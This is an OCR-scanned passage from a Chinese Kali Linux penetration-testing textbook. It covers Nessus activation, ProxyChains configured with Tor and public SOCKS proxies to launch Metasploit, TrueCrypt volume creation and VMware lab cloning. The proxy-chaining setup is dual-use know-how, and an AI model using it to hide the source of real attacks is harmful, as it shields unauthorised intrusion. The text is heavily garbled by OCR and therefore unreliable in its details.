在 该 界面 选择 免费 版 Using Nessus at Home? 选 项 ， 单 击 Select 按钮 ， 将 显示 如 图 2.3 
所 示 的 界面 。 


= 


‘Cg naria 
» 


[a m Google Be 图 百度 -您 的 访问 出 错 了 图 百度 一 下 ,你 就 知道 E) aboutblank 


Activation Code 


enable Nessus® Home allows you to scan your personal home 
etwork (up to 16 IP addresses per scanner) with the same high- 
peed, in-depth assessments and agentless scanning 
onvenience that Nessus subscribers enjoy. 


Please note that Nessus Home does not provide access to 
upport, allow you to perform compliance checks or content 
hudits, or allow you to use the Nessus virtual appliance. If you 
equire support and these additional features, please purchase a 


essus subscription 


essus Home is available for personal use in a home 
»nvironment only. It is not for use by any commercial 
prganization. 


Check to receive updates 
from Tenable 


v I agree to the terms of 


service 


Register 


图 2.3 注册 信息 
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胡 访 界面 填写 一 些 注册 信息 ， 填 写 完 后 ， 单 击 Register 按钮 ， 将 在 注册 的 邮箱 中 收 到 
二 份 邮件 。 进 入 邮箱 后 ， 可 看 到 该 邮件 中 有 一 个 激活 码 。 
(5) 为 Nessus 网 络 接口 创建 一 个 用 户 账户 。 执 行 命令 如 下 所 示 : 


root@Kali:~# /opt/nessus/sbin/nessus-adduser 


Login : admin # 输 入 用 户 名 为 admin 

Login password : # 输 入 用 户 密 码 

Login password (again) : # 输 入 确认 密码 

Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y 
User rules # 用 户 规 则 


nessusd has a rules system which allows you to restrict the hosts 

that admin has the right to test. For instance, you may want 

him to be able to scan his own host only. 

Please see the nessus-adduser manual for the rules syntax 

Enter the rules for this user, and enter a BLANK LINE once you are done : 


(the user can have an empty rules set) # 按 下 空格 键 提交 输入 
Login : admin 

Password MEE EEEE EEE EE 

This user will have ENDE privileges within the Nessus server 

Rules 

Is that ok ? (y/n) [y] y 

User added # 用 户 被 添加 


从 输出 的 信息 中 可 以 看 到 admin 用 户 被 添加 成 功 了 。 
(6) 激活 Nessus。 执 行 命令 如 下 所 示 : 
root@Kali:~# /opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX- XXXX-XXXX 


以 上 命令 XXXX-XXXX-XXXX-XXXX-XXXX 指 的 是 在 邮件 中 获取 到 的 激活 码 。 
执行 以 上 命令 后 ， 输 出 信息 如 下 所 示 : 


Your Activation Code has been registered properly - thank you. 
Now fetching the newest plugin set from plugins.nessus.org # 等 待 一 段 时 间 
Could not verify the signature of all-2.0.tar.gz # 不 能 证 实 all-2.0.tar.gz 的 签名 


(7) 局 动 Nessus 服务 。 执 行 命令 如 下 所 示 : 

root@Kali:~# /etc/init.d/nessusd start 

在 第 (6) 步骤 中 激活 Nessus 时 ， 输出 和 以 上 相同 的 信息 ， 表 示 没 有 激活 Nessus. iX 
个 问题 在 RHEL 上 不 会 出 现 的 。 不 过 ， 这 里 有 方法 来 解决 这 个 问题 。 具 体操 作 步 又 如 下 
Bra. 

(1) 删除 文件 nessus-fetch.rc。 执 行 命令 如 下 所 示 : 


root@Kali:~# rm /opt/nessus/etc/nessus/nessus-fetch.rc 

(2) 使 用 nessus-fetch --challenge 获取 挑战 码 。 执 行 命 令 如 下 所 示 : 
root@Kali:~# /opt/nessus/bin/nessus-fetch --challenge 

Challenge code: XXXXXXXXXXXXXXXXXXXXXXXX 


You can copy the challenge code above and paste it alongside your 
Activation Code at: 
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HH, XXXXXXXXXXXXXXXXXXXXXXXX 是 输出 的 挑战 码 。 

(3) 重新 登录 http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation- 
code 网 站 获取 激活 码 。 

(4) 登录 https://plugins.nessus.org/offline php 网 站 , 在 该 界面 输入 生成 的 挑战 码 和 激活 
$3, ünl 2.4 所 示 的 界面 。 


Tenable Network Security ~ Iceweasel 
File Edit View History Bookmarks Tools Help 
© Tenable Network Security lel -— | 
« m 


© Most Visitedv [JOffensive Security “A Kali Linux "Kali Docs KliExploit-DB W Aircrack-ng 


store wee intact 


tenable 


jucts lutions f s Fes s Support & ainina A ut 
network security iraa - s »upport & Train J bout 


Type 'nessus-fetch --challenge' on your nessusd server and type in the result : 


Enter your activation code : 


DEXIEGUGREGOATF ATTISCPHET] 


图 2.4 ”获取 插件 
此 时 单 击 Submit 按钮 ， 将 显示 如 图 2.5 所 示 的 界面 。 


Tenable Network Security - Iceweasel 
File Edit View History Bookmarks Tools Help 
© Tenable Network Security | oe | 


€ @ https://plugins.nessus.org/offline.php v @| | 图 ~ Google Q db 


Ex Most VisitedY [JOffensive Security Ñ Kali Linux “Kali Docs MJExploit-DB Aircrack-ng 


Thank you. You can now obtain the newest Nessus plugins at : 


http://plugins.nessus.org/get.php ?f=all-2.0.tar.gz&u=c725ab5a948 e49b8 a564c5b79336409f& 
p=eb02c79d67f9859d891f27b74dc5d1f0 


You also need to copy the following file to : 


e /opt/nessus/etc/nessus/nessus-fetch.re (Unix) 


e C:\Documents and Settings\All Users\Application Data\Tenable\Nessus\conf\nessus- 
fetch.rc (Windows XP/2K3) 


es C:\ProgramData\Tenable\Nessus\confinessus-fetch.rc (Windows Vista/7/8/2008/201 2) 
* /Library/Nessus/run/etc/nessus/nessus-fetch.rc (Mac OS X) 
e /usr/local/nessus/etc/nessus/nessus-fetch.rc (FreeBSD) 


nessus-fetch.rc 


图 2.5 下 载 插件 


«Al 。 


"Bl Linux 安全 渗透 测试 基础 


从 该 界面 下 载 nessus-fetch.re 和 all-2.0.tar.gz， 将 其 下 载 到 本 地 。 
(5) 将 下 载 到 的 nessus-fetch.re 文件 复制 到 /opt/nessus/etc/nessus/ 目 录 下 。 执 行 命令 如 
下 所 示 : 


root@Kali:~# cp /root/nessus-fetch.rc /opt/nessus/etc/nessus 


执行 以 上 命令 后 ， 没 有 任何 输出 信息 。 
(6) 使 用 nessus-update-plugins 命令 将 Nessus 的 插件 all-2.0.tar.gz 加 载 。 执 行 命令 如 下 
所 示 : 


root@Kali:~# /opt/nessus/sbin/nessus-update-plugins /root/all/all-2.0.tar.gz 
Expanding /root/all/all-2.0.tar.gz... 
Done. The Nessus server will start processing these plugins within a minute 


(7) HP AB Nessus 服务 。 执 行 命令 如 下 有 所 示 : 


root@Kali:~# /etc/init.d/nessusd restart 

$Shutting down Nessus : . 

$Starting Nessus : . 

以 上 步骤 操作 完成 后 ，Nessus 了 驶 被 激活 了 。 如 果 不 激 活 Nessus， 它 是 不 能 使 用 的 。 
在 Kali 中 安装 Squid 服务 。 执 行 命令 如 下 所 示 : 


root@Kali:~# apt-get install squid3 
设置 Squid 服务 开机 不 目 动 局 动 。 执 行 命令 如 下 所 示 : 


root@Kali:~# update-rc.d -f squid3 remove 


2.4 jx & ProxyChains 


ProxyChains 是 Linux 和 其 他 Unices 下 的 代理 工具 。 它 可 以 使 任何 程序 通过 代理 上 网 ， 
允许 TCP 和 DNS 通过 代理 降 道 ， 文 持 HTTP, SOCKS4 和 SOCKSS 类 型 的 代理 服务 费 ， 
并 且 可 配置 多 个 代理 。ProxyChains 通过 一 个 用 户 定义 的 代理 列表 强制 连接 指定 的 应 用 程 
序 ， 直 接 断 开 接收 方 和 发 送 方 的 连接 。 本 节 将 介绍 设置 ProxyChains 的 方法 。 

设置 ProxyChains 的 具体 操作 步骤 如 下 所 示 。 

(1) 打开 ProxyChains 配置 文件 。 执 行 命令 如 下 所 示 : 

root@Kali:~# vi /etc/proxychains.conf 

执行 以 上 命令 后 ， 打 开 文 件 的 内 容 如 下 所 示 : 

proxychains.conf VER 3.1 


= HTTP, SOCKS4, SOCKSS tunneling proxifier with DNS. 
= 

# The option below identifies how the ProxyList is treated. 

# only one option should be uncommented at time, 

# otherwise the last appearing option will be accepted 

= 

#dynamic_chain 

= 

# Dynamic - Each connection will be done via chained proxies 
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# all proxies chained in the order as they appear in the list 
# at least one proxy must be online to play in chain 

# (dead proxies are skipped) 

# otherwise EINTR is returned to the app 

= 

strict_chain 

# 

# Strict - Each connection will be done via chained proxies 
# all proxies chained in the order as they appear in the list 
# all proxies must be online to play in chain 

# otherwise EINTR is returned to the app 

# 

#random_chain 

= 

# Random - Each connection will be done via random proxy 
# (or proxy chain, see chain len) from the list. 

# this option is good to test your IDS :) 


输出 的 信息 就 是 proxychains.conf 文件 的 内 容 。 由 于 篇 幅 的 原因 ， 这 里 只 列 出 了 部 分 
内 容 。 

(2) 将 proxychains.conf 文件 中 的 dynamic. chain 前 面 的 注释 从 取消 。 要 修改 的 配置 项 ， 
是 上 面 加 粗 的 部 分 ， 如 下 所 示 : 


dynamic_chain 


G) SJ — ETOGUIR AT 28 Bl A Cproxychains.conf 文件 末尾 ) ， 如 下 所 示 : 
# ProxyList format 


= type host port [user pass] 

= (values separated by 'tab' or 'blank’) 

= 

= 

= Examples: 

= 

= socks5 192.168.67.78 1080 lamer secret 
# http 192.168.89.3 8080 justu hidden 
= socks4 192.168.1.49 1080 

= http 192.168.39.93 8080 

# 

= 

= proxy types: http, socks4, socks5 

- ( auth types supported: "basic -http  "user/pass"-socks ) 
= 

[ProxyList] 

# add proxy here ... 

# meanwile 


# defaults set to "tor" 
socks4  127.0.0.1 9050 
socks5 98.206.2.3 1893 
socks5 76.22.86.170 1658 


-插入 一 


以 上 信息 中 加 粗 的 部 分 为 添加 的 代理 服务 器 。 
(4) 通过 用 户 的 连接 代理 解析 目标 主机 。 执 行 命令 如 下 所 示 : 


root@kali:~# proxyresolv www.target.com 


默认 情况 下 ,执行 proxyresolv 命令 , 可 能 看 到 该 命令 没 找到 错误 信息 。 因 为 proxyresolv 
保存 在 /usrlib/proxychains3/ 目 录 中 ， 而 不 能 被 执行 。proxyresolv 会 被 proxychains 调用 ， 所 
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以 将 这 两 个 文件 放 在 一 个 目录 中 ， 如 /sr/bin。 执 行 命令 如 下 所 示 : 
root@kali:~# cp /usr/lib/proxychains3/proxyresolv /usr/bin/ 


执行 完 以 上 命令 后 ，proxyresolv 命令 就 可 以 执行 了 。 
C5) 通过 用 户 想 要 使 用 的 应 用 程序 运行 ProxyChains， 例 如 ， 局 动 msfconsole。 执 行 命 
令 如 下 所 示 : 


root@kali:~# proxychains msfconsole 
ProxyChains-3.1 (http://proxychains.sf.net) 
IDNS-request| 0.0.0.0 
|S-chain|-<>-127.0.0.1:9050-<--timeout 
|DNS-response]: 0.0.0.0 is not exist 


/ \ 
( -0 一) 
DOTT 
i 
0 0\ MSF J| 
E EM. 
|| WW [l| 


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro 
-- type 'go pro' to launch it now. 


-[ metasploit v4.7.0-2013082802 [core:4.7 api:1.0] 
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post 
+ -- --=[ 310 payloads - 30 encoders - 8 nops 


msf > 


执行 以 上 命令 后 ， 看 到 ms 他 提示 符 表 示 msfconsole 局 动 成 功 了 。 表 示 ProxyChains ix 
置 成 功 o 
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ft Kali 中 提供 了 一 个 目录 加 密 工 具 TmeCrypt。 该 工具 是 一 球 开 源 的 绿色 加 密 卷 加 密 
软件 ， 不 需要 生成 任何 文件 即 可 在 便 盘 上 建立 虚拟 磁盘。 用 户 可 以 按照 盘 符 进行 访问 ， 所 
以 虚拟 磁盘 上 的 文件 都 被 目 动 加 密 ,， 访问 时 需要 使 用 密码 解密 。TrmeCrypt 提供 多 种 加 密 算 
法 ， 包 括 AES, Serpent, Twofish, AES-Twofish 和 AES-Twofish-Serpent 等 。 本 节 将 介绍 
TrueCrypt 工具 的 使 用 。 


2.5.1 创建 加 密 目 录 


使 用 TrueCrypt 工具 加 密 目 录 。 具 体操 作 步 又 如 下 所 示 。 
(1) 启动 TrueCrypt 工具 。 在 终端 执行 如 下 所 示 的 命令 : 
root@kali:~# truecrypt 
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执行 以 上 命令 后 ， 将 显示 如 图 2.6 所 示 的 界面 。 


TrueCrypt 


Volumes Favorites Tools Settings Help k 


Slot Volume Size Mount Directory Type 


Create Volume | Volume Properties... | | Wipe Cache | 


Volume 


£4 | v Select File... 
ee S REY Vo.ume Tools... | Select Device. . | 


oo Ce 


图 2.6 TrueCrypt 初始 界面 


(2) 在 该 界面 单 击 Create Volume 按钮 ， 将 显示 如 图 2.7 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard k - | X 


TrueCrypt Volume Creation Wizard 
© 


Creates a virtual encrypted disk within a file. 
Recommended for inexperienced users. 


More information 


O Create a volume within a partition/drive 


Formats and encrypts a non-system partition, entire 
external or secondary drive, entire USB stick, etc. 


图 2.7 TrueCrypt Volume Creation Wizard 
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GO TE VA ZEB EE GI EAE TER. 这 里 选择 默认 的 Create an encrypted file container 选项 ， 
单 击 Next 按钮 ， 将 显示 如 图 2.8 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard 


Volume Type 
® ‘Standard TrueCrypt vo lume 


Select this option if you want to create a normal 
TrueCrypt volume. 


© Hidden TrueCrypt volume 


It may happen that you are forced by somebody to 
reveal the password to an encrypted volume. There are 
many situations where you cannot refuse to reveal the 
password (for example, due to extortion). Using a 
so-called hidden volume allows you to solve such 
situations without revealing the password to your 
volume. 


More information about hidden volumes 


图 2.8 Volume Type 


(4) 该 界面 选择 卷 类 型 ， 这 里 选择 默认 的 Standard TrueCrypt volume, JÉit; Next 按钮 ， 
将 显示 如 图 2.9 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard 3 


Volume Location 


[ Y | [Select File... 


Never save history 


A TrueCrypt volume can reside in a file (called TrueCrypt 
container), which can reside on a hard disk, on a USB flash 
drive, etc. A TrueCrypt container is just like any normal file 
(it can be, for example, moved or deleted as any normal 
file). Click 'Select File' to choose a filename for the 
container and to select the Location where you wish the 
container to be created. 


WARN ING; If you select an existing file, TrueCrypt will 
NOT encrypt it; the file will be deleted and replaced with 
the newly created True Crypt container. You will be able 
to encrypt existing files (later on) by moving them to the 
TrueCrypt container that you are about to create now. 


图 29 Volume Location 
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(5 六 在 该 界面 单 击 Select File... 按 钮 ， 将 显示 如 几 2.10 所 示 的 界面 。 


Specify a New TrueCrypt Volume h 


BHN): 
保存 于 文件 夹 f) : 创建 文件 夹 (L) 


v 大 小 “| 修改 日 其 
2014 年 03 月 14 日 
国 fbterm-1.7.0.tar.gz 9.6 KB ”星期 一 
|] wlan-O1.vs 434-7 星期 四 


一 “All Files a 


| 取消 (C) | 保存 (5) | 


图 2.10 指定 一 个 新 TrueCrypt 4 


(6) 在 该 界面 为 新 孽 指定 一 个 名 称 和 位 置 ， 这 里 创建 的 孽 名 称 为 CryptVolume， 保 存 
在 /root 目录 下 。 然 后 单 击 “ 保 存 ” 按 钮 ， 将 显示 如 图 2.11 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard k E x 


Volume Location 


[root/ CryptVolume | v | Select File... 


Never save history 


A TrueCrypt volume can reside in a file (called TrueCrypt 
container), which can reside on a hard disk, on a USB flash 
drive, etc. A TrueCrypt container is just like any normal file 
(it can be, for example, moved or deleted as any normal 
file). Click ‘Select File’ to choose a filename for the 
container and to select the location where you wish the 
container to be created. 


WARNING: If you select an existing file, TrueCrypt will 
NOT encrypt it; the file will be deleted and replaced with 
the newly created TrueCrypt container. You will be able 
to encrypt existing files (Later on) by moving them to the 
TrueCrypt container that you are about to create now. 


图 2.11 Volume Location 


(7) 在 该 界面 可 以 看 到 前 面 创建 的 卷 的 名 称 和 位 置 。 然 后 单 击 Next 按钮 ,将 显示 如 图 
2.12 所 示 的 界面 。 

(8) 在 该 界面 选择 加 密 算 法 ， 这 里 选择 默认 的 加 密 算 法 AES， 然 后 单 击 Next 按钮 ， 
将 显示 如 图 2.13 所 示 的 界面 。 
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TrucCrypt Volume Creation Wizard 


k 
Encryption Options 


-Encryption Algorithm 


AES Test 
FIPS-approved cipher (Rijndael, publisted in 1998) that 
may be used by U.S. government departments anc 
agencies to protect classified information up to the Top 
Secret level. 256-bit key, 128-bit block, 14 rounds 
(ACS-256). Mode of operationis XTS. 


Benchmark | 


Hash Algorithm 


| RIPEMD-160 S| Information or hash algorithms 


图 2.12 Encryption Options 


TrueCrypt Volume Creation Wizard 


Volume Size 


me — [ws]  * 


Free space available: 61.1 GB 


Please specify the size of the container to crea:e. Note 
that the minimum possible size cf a volume s 292 KB. 


| PSRA(H) « Prev | Next > | | BUB (C) | 


图 2.13 Volume Size 


(9) 在 该 界面 指定 耸 的 大 小 为 10GB, Aja il; Next 按钮 ， 将 显示 如 图 2.14 所 示 的 
FIR. 
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TrueCrypt Volume Creation Wizard k — 


Volume Password 


[ ] Display password 


CO Use keyfiles 


It is very mportart tha: you choose e gooc passwerd, You 
should avoid choosing one that contains orly a single word 
that can be found in a dict onary (or a combinaticn of 2, 3, 
or 4 such words). It should not contain any names or dates 
of brth. It should nct be easy to guess. A good password 
is a "ardom combination of upper and Lower case Letters, 
numbers, and special characters, such as @ ^ = $ * + etc. 
We recommend choosing a password consisting of mcre 


than 20 characters (the Longer, the better). The maximum 
possible Length is 64 characters. 


FS BA (H) | « Prev | Next? | 取消 (C) | 


图 2.14 Volume Password 


(10) 在 该 界面 输入 一 个 卷 的 密码 ， 然 后 单 击 
Next 按钮， 将 显示 如 图 2.15 所 示 7^ 的 界面 。 A ssa an passwords are —. using brute 
COLD) ZEIT BCL EHAK, 建议 大 小 20 ——— 
个 字符 。 如 果 确 认 要 使 用 该 密码 的 话 ， 单 击 “ 是 ” ER 
按钮 ， 将 显示 如 图 2.16 所 示 的 界面 。 [ 8m ]| em | 
(12) 在 该 界面 选择 存储 到 克文 件 的 大 小 ， 
选择 I will not store files larger than 4GB on the 
volume。 然 后 单 击 Next 按钮 ， 将 显示 如 图 2.17 所 示 的 界面 。 


一 


图 2.1$ 警告 信息 


TrucCrypt Volume Creation Wizard k 


Large Files 


® r will nct store files larger than 4 GB on the volume 


Choose this option f ycu do not need to store files 
larger than 4 GB (4,294,967,296 bytes) on the 
volumc. 


© | will store files Larger than 4 GB on the volume 


Choose this option f ycu need to store files larger than 
4 GB (4,294,967, 296 bytes) on the volume. 


图 2.16 Large Files 
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TrueCrypt VoLume Creation Wizard n 


Format Options k 


Filesystem Options: 


Filesystem type: S 


Volume Format Options 


[] Quick format | 


In order to enable your operating system to mount your 
new volume, it has to be formatted with a filesystem. 
Please select a filesystem type. 


If your volume is going to be hosted on a device or 
partition, you can use ‘Quick format’ to skip encryption of 


free space of the volume. 


ere | 


图 2.17 Format Options 


(13) 在 该 界面 选择 文件 系统 类 型 , 默认 是 FAT. 该 工具 还 支持 Linux Ext2, Linux EXt3 
和 Linux Ext4 文件 类 型 。 这 里 选择 Linux Ext4， 单 击 Next 按钮 ， 将 显示 如 图 2.18 所 示 的 
Zi If. 


TrueCrypt Volume Creation Wizard 
k 
Cross-Platforin Support 


© | will mount the volume on other platforms 


Choose this opticn if you need to use the volume on 
other platforms. 


(e) r will mount the volume only on Linux 


Choose this opticn if you do rot need to use the 
volume on other alatforms. 


图 2.18 Cross-Platform Support 


(14) 该 界面 选择 挂 载 该 卷 的 一 个 平台 ， 这 里 选择 第 二 种 方式 I will mount the volume 
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only on Linux, it; Next 按钮 ， 将 显示 如 图 2.19 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard m 


Volume Format 


Random Pool: 4€4/192/31958E8E/895D64DD519.. W) ‘she 


Header Key: 
Mester Key: 


IMPORTANT: Move your mcuse as randomly as possible 
within this window. The longer you move it, the better. 
This signficantly ircreases the cryptographic strength of 
the encryption «eys. Then click Format to create the 


vulume. 


图 2.19 Volume Format 


(150 现在 要 格式 化 前 面 创建 的 卷 ， 此 时 单 击 Format 按钮 ， 将 显示 如 图 2.20 所 示 的 
界面 。 


TrueCrypt Volume Creation Wizard 


Volume Format 


Random Pool; C862E39274924F41B2C11DF62B.. She 
Header Key: 1B2DA43413D07F2D70C699C769. . 
Master Key: 0626EDBSEOSE4DC71SFDABE4CC . . 


图 Áh.  . . ENTM 


Done 9.404% Speed | 70 MB/s | Left | 2 minutes | 


IMPORTANT: Move your mouse as randomly as possible 
within this window. The Longer you move it, the better. 
This significantly increases the cryptographic strength of 
the encryption keys. Then click Format to create the 


volume. 


PE BIH) < Prey Format 


图 2.20 格式 化 过 程 
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C16) 该 界面 显示 了 格式 化 的 进度 、 速 度 和 时 间 等 信息 。 该 过 程 运行 完 后 ， 将 显示 如 
图 2.21 所 示 的 界面 。 


TrueCrypt 


t» The TrueCrypt volume has been successfully created. 


图 2.21 TrueCrypt 卷 创 建成 功 


(17) 看 到 上 面 的 窗口 ， 表 示 TrueCrypt EERI Y o IEI, Aii ME” A, 
显示 如 图 2.22 所 示 的 界面 。 


TrueCrypt Volume Creation Wizard 


Volume Created 


The TrueCrypt volume has been created and is ready for 
use. If you wish to create another TrueCrypt volume, click 
Next. Otherwise, click Exit. 


re | 


图 2.22 Volume Created 


(18) 此 时 TrueCrypt 元 就 创建 完成 了 。 如 果 还 想 要 创建 另 一 个 TrueCrypt $A, $ 
i Next 按钮 。 奋 则 单 击 Exit 按钮 。 单 击 Exit 投 钮 后 ， 将 返回 到 图 2.6 所 示 的 界面 。 


252 文件 夹 解 密 


在 上 一 小 区 中 成 功 创 建 了 加 密 目 录 。 如 条 要 奏 看 加 密 的 内 容 ， 需 要 将 该 耸 解 密 后 才 可 
访问 。 为 了 解密 卷 ， 需 要 从 图 2.6 的 列表 中 选择 一 个 槽 。 然 后 单 击 Select File... 按 钮 ， 打 开 
刚才 创建 的 CryptVolume 42. XH 8i Mount 按钮 ， 将 显示 如 图 2.23 所 示 的 界面 。 

在 该 界面 输入 创建 CryptVolume 时 设置 的 密码 ， 单 击 “ 确 定 ” 按 钮 ， 将 显示 如 图 2.24 
所 示 的 界面 。 
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True Crypt 


Volumes Favorites Tools Settings Help 


Slot Volume 


Enter password for "/root/CryptVolume" 


Password azo) 
Cl Cache passwords and keyfiles in memory 取消 (C) 


C Display password 


Create Volume Volume Properties, Wipe Cache 


Volume 


Eg /root/CryptVolume Select File... 
Never save history — ee 


K 2.23 ERX 


TrueCrypt = | x i 


Volumes Favcrites Tools Settings Help 


Slot Volume Size Mount Directory Type 


| Create Volume Volume Properties... | Wipe Cache 


-Volume 


ed /root/CryptVolume M 
MI Never save history | Volume Toois... 


图 2.24 CryptVolume 卷 挂 载 成 功 


从 该 界面 可 以 看 到 CryptVolume 卷 的 挂 载 信 息 、 大 小 和 卷 的 位 置 等 。 此 时 ， 用 户 可 以 
通过 双击 在 槽 中 的 卷 或 者 挂 载 点 来 访问 这 个 卷 。 当 对 该 文件 操作 完成 后 ， 可 以 单 击 
Dismount All 424] $123 12:45 « 
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局 级 测试 实验 军 可 以 构建 各 种 渗透 攻击 的 目标 系统 。 通 过 前 面 的 介绍 ， 大 家 已 经 了 解 
在 Kali Linux 下 可 使 用 的 工具 。 为 了 更 好 地 验证 这 些 工具 的 作用 ， 必 须 有 一 个 高 级 测试 实 
验 室 。 本章 将 介绍 如 何 使 用 VMware Workstation 构建 各 种 操作 系统 。 本章 主要 知识 点 如 下 : 

口 使 用 VMware Workstation; 

口 攻击 WordPress 和 其 他 应 用 程序 。 


3.1 使 用 VMware Workstation 


在 第 1 章 简 略 地 讲解 了 在 VMware Workstation 上 安装 Kali Linux 虚拟 环境 的 过 程 。 
VMware Workstation 允许 安装 操作 系统 并 且 运 行 虚拟 环境 。 这 个 工具 是 非常 重要 的 ， 它 可 
以 为 熟悉 Kali Linux 功能 提供 了 目标 主机 。 本 书 中 使 用 到 的 虚拟 机 操作 系统 有 Windows 
XP. Windows 7、Metasploitable 2.0 和 Linux. 这 些 系统 都 可 以 到 它们 的 官网 下 载 相 应 的 ISO 
XIF, 然后 在 VMware Workstation 上 安装 。 这 些 安装 系统 的 安装 方法 和 在 第 1 章 介 绍 安装 
Kali Linux 的 方法 一 样 ， 这 里 就 不 青 歼 述 。 

当 用 户 在 主机 上 执行 任务 时 ， 可 能 会 导致 其 他 系统 不 称 定 甚至 无 法 运行 。 为 了 方便 用 
PHE, VMware Workstation 提供 了 一 个 非 钊 好 的 工具 ， 实 现 虚 拟 环境 的 复制 。 这 样 ， 残 
避免 了 用 户 反复 创建 虚拟 机 系统 。 殉 隆 虚 拟 环境 时 ， 必 须 将 该 系统 关闭 。 和 否则， 不 能 死 隆 。 
复制 虚拟 环境 的 具体 操作 步骤 如 下 所 示 。 

(1) 在 VMware Workstation 主 界面 先 选择 要 复制 的 虚拟 机 。 然 后 在 该 界面 依次 选择 “ 虚 
拟 机 ”|“ 管 理 CM) " | *séEE CCO ”命令 ， 将 显示 如 图 3.1 所 示 的 界面 。 


>» 欢迎 使 用 克隆 虚拟 机 向 导 


此 向 导 将 帮助 您 创建 此 虚拟 机 的 副本 。 

如 果 您 想 让 其 他 用 户 创建 此 虚拟 机 的 克隆 ， 
应 在 "虚拟 机 “> "设置 “> "选项 "> ER US 
用 模板 模式 。 


vmware 
Workstation 


CE-E [RO 3) 


图 3.1 XOU fT v EE IDA IRI ST 
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(2 六 在 该 界面 单 击 “ 下 一 步 ” 控 钮 ， 将 显示 如 图 3.2 所 示 的 界面 。 


克隆 源 
您 想 从 哪个 状态 创建 克隆 ? 


克隆 自 
© 虚拟 机 中 的 当前 状态 (C) 
从 当前 状态 创建 链接 克隆 将 创建 一 个 新 快照 。 


现 有 快照 ( 仅 限 关闭 的 虚拟 机 )(S): 
| 


此 虚拟 机 没有 可 克隆 的 快照 。 


《上 一 步 @? 


图 3.2 pU 


(3) 在 该 界面 可 以 选择 从 哪个 状态 创建 元 隆 ， 这 里 选择 “虚拟 机 中 的 当前 状态 ”选项 。 
然后 单 击 “ 下 一 步 ” 按 钮 ， 将 显示 如 几 3.3 所 示 的 界面 。 


克隆 类 型 


您 希望 如 何 克 隆 此 虚拟 机 ? 


克隆 方法 


© 创建 许 接 克隆 (L) 
链接 克隆 是 对 原 粹 虚拟 机 的 引用 ， 所 需 的 存 情 碟 盘 空间 较 少 。 但 是 ， 必 须 能 钟 
访问 原始 虚拟 机 才能 运行 。 


© 创建 完整 克隆 (F) ee 
SRS S AAA MADRE 。 此 副本 虚拟 机 完全 独立 ， 但 需要 较 
多 的 存储 磅 盘 空 间 。 


图 3.3 ”克隆 方法 


(4) 在 该 界面 选择 克隆 方法 。 默 认 提 供 了 “创建 链接 克隆 ”和 “创建 完整 元 隆 ” 两 种 
方法 。 本 例 中 选择 “创建 完整 区 隆 ” 选 项 ， 然 后 单 击 “ 下 一 步 ” 按 钮 ， 将 显示 如 图 3.4 所 
示 的 界面 。 

O 链接 克隆 : 它 是 从 父 本 的 一 个 快照 克隆 出 来 的 。 链 接 克 隆 需 要 使 用 到 父 本 的 人 磁盘 

文件 ， 如 果 父 本 不 可 使 用 比如 被 删除 》， 那 么 链接 克隆 也 不 能 使 用 了 。 
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DQ 完整 克隆 : 它 是 一 个 独立 的 虚拟 机 ， 殉 隆 结束 后 它 不 需要 共 理 父 本 。 该 过 程 是 完 


全 克隆 一 个 父 本 ， 并 且 和 父 本 完全 分 离 。 完 整 克 隆 只 是 从 父 本 的 当前 状态 开始 死 
隆 ， 殉 隆 结束 后 和 父 本 就 没有 任何 关联 了 。 


新 虚 以 机 名 称 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 


虚拟 机 名 称 (V) 
Kali 的 克 降 | 


位 置 (L) 
D: VERE e Documents Virtual Machines\Kali 的 克隆 


图 3.4 新 虚拟 机 名 称 


C5) 该 界面 用 来 设置 虚拟 机 的 名 称 和 位 置 。 然 后 单 击 “ 完 成 ”按钮 ， 将 显示 如 图 3.5 
所 示 的 界面 。 


正在 克隆 虚拟 机 


v 正在 准备 克隆 操作 
正在 创建 完整 克隆 


VMware Workstation 


图 3.5 正在 克隆 虚拟 机 


(6) 该 界面 是 克隆 虚拟 机 的 一 个 过 程 。 克 隆 完 成 后 ， 将 显示 如 图 3.6 所 示 的 界面 。 

CI) 从 该 界面 可 以 看 到 虚拟 机 已 元 隆 完成 ， 此 时 单 击 “关闭 ”按钮 ， 元 隆 的 虚拟 机 会 
自动 添加 到 VMware Workstation 主 窗口 界面 ， 如 图 3.7 所 示 。 

(8) 现在 束 可 以 单 击 “ 开 局 此 虚拟 机 ”按钮 ， 运 行 殉 隆 的 操作 系统 了 。 
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正在 克隆 虚拟 机 


v 正在 准 音 克 隆 操作 
v 正在 创建 完整 克隆 


v RR 


图 3.6 ”克隆 完成 


ij) Kali 29985 - VMware Workstation 

XHA SE) BBV) ”虚拟 机 (M) BRET) ”帮助 (H) 

Pi |oQGd mE kk X & | 23 

G Kal 1.0.6 X | Gi Kab AYRE x | 一 Kai10.5 X | (ij WordPress || Gi) Wincows7 x 
(4 Kali 的 克隆 


P 开启 此 虚拟 机 
中 篇 丝 虚拟 机 设置 
b> ARE, 


v 设备 
AF 2 GB 
Ld 处 理 器 4 
CS ee SCS) 80 GB 
“CD/DVD (IDE) 正在 使 用 文件 . 
SE 自动 检测 
OE a 桥接 模式 (自动 ) 
USB 柠 制 器 fe 
or 自动 检测 ~ 虚拟 机 详细 信息 
den STEDHL 存在 状态 - 已 关机 
aS 启动 检测 em 配置 文件 : 了 D'\ 我 的 资料 库 \Documents\Virtual Machines WKali 
的 克隆 \Kali 的 克隆 .vmx 
HERTE Workstation 9.0 虚拟 机 


v ftt 


图 3.7 v BEI HEPA 


32 攻击 WordPress 和 其 他 应 用 程 友 


今天 越 来 越 多 的 企业 利用 SAAS (Software as a Service) 工具 应 用 在 他 们 的 业务 中 。 例 


如 ， 他 们 经 党 使 用 WordPress 作为 他 们 网 站 的 内 容 管理 系统 ， 或 者 在 局 域 网 中 使 用 Drupal 
框架 。 从 这 些 应 用 程序 中 找到 漏洞 ， 是 非常 有 价值 的 。 


为 了 收集 用 于 测试 的 应 用 程序 ，Tumkey Linux 是 一 个 非常 好 的 资源 。Turnkey 工具 的 
